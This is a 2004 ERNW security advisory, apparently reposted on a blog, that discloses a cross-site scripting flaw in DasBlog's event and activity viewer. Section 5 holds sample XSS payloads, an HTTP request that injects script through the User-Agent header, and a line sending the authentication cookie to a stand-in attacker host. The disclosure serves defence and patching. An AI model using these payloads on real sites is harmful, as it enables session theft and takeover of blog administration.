Security Advisory : XSS Vulnerability in Newtelligence DasBlog

ERNW Security Advisory

Cross-Site Scripting Vulnerability in Newtelligence DasBlog

Author:
Dominick Baier <dbaier@ernw.de>

1. Summary:
A XSS (Cross-Site-Scripting) Vulnerability in DasBlog’s Event and Activity Viewer allows to inject and execute code on the client’s machine. This allows an attacker to transfer the ASP.NET authentication cookie to a server of his choice. The attacker can use this cookie to log on to DasBlog and modify blog entries and configuration settings.

2. Severity : Critical

3. Systems affected

DasBlog Versions:
 All

Browsers
 Tested with IE 6 and Firefox 0.93

4. Patch Availability / Vendor Instructions

5. Details

The Activity and Events Viewer show details about requests that were made to the blog site. As extra information they show the Referrers, Query Strings and User Agents of these requests. It is possible to specially malform those HTTP Headers to inject scripting code. This code gets embedded in the HTML pages and executed on the client. With specially crafted JavaScript code a attacker can transfer the ASP.NET Forms Authentication Cookie to a server of the his choice. While injecting this cookie in a HTTP request to DasBlog he can authenticate without having to know the username or the password and enter the administrative area.

Examples of script injections

<script>alert(‘XSS’)</script>
<img%20src=”javascript:alert(‘XSS’)”>
<img%20src=javascript:
alert(&quot;XSS&quot;)>

Leading e.g. to the following HTTP request

GET / HTTP/1.1
User-Agent: <script>alert(‘xss’)</script>
Host: www.victim.comrn
Accept: */*

Example of transferring a cookie using JavaScript

<script>document.location=’http://www.evil-site.com/cookieEater.aspx?cookie=’+document.cookie</script&gt;

6. Solution
Install the patch.

7. Time-Line
The vulnerability was found on the 15th August 2004. The author was contacted on the same day with a immediate response. The patch has been provided on the 30.August 2004

8. Disclaimer
 
The informations in this advisory are provided “AS IS” without warranty
of any kind. In no event shall the authors be liable for any damages
whatsoever including direct, indirect, incidental, consequential,
loss of business profits or special damages due to the misuse of any
information provided in this advisory.

This entry was posted in Uncategorized. Bookmark the permalink.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s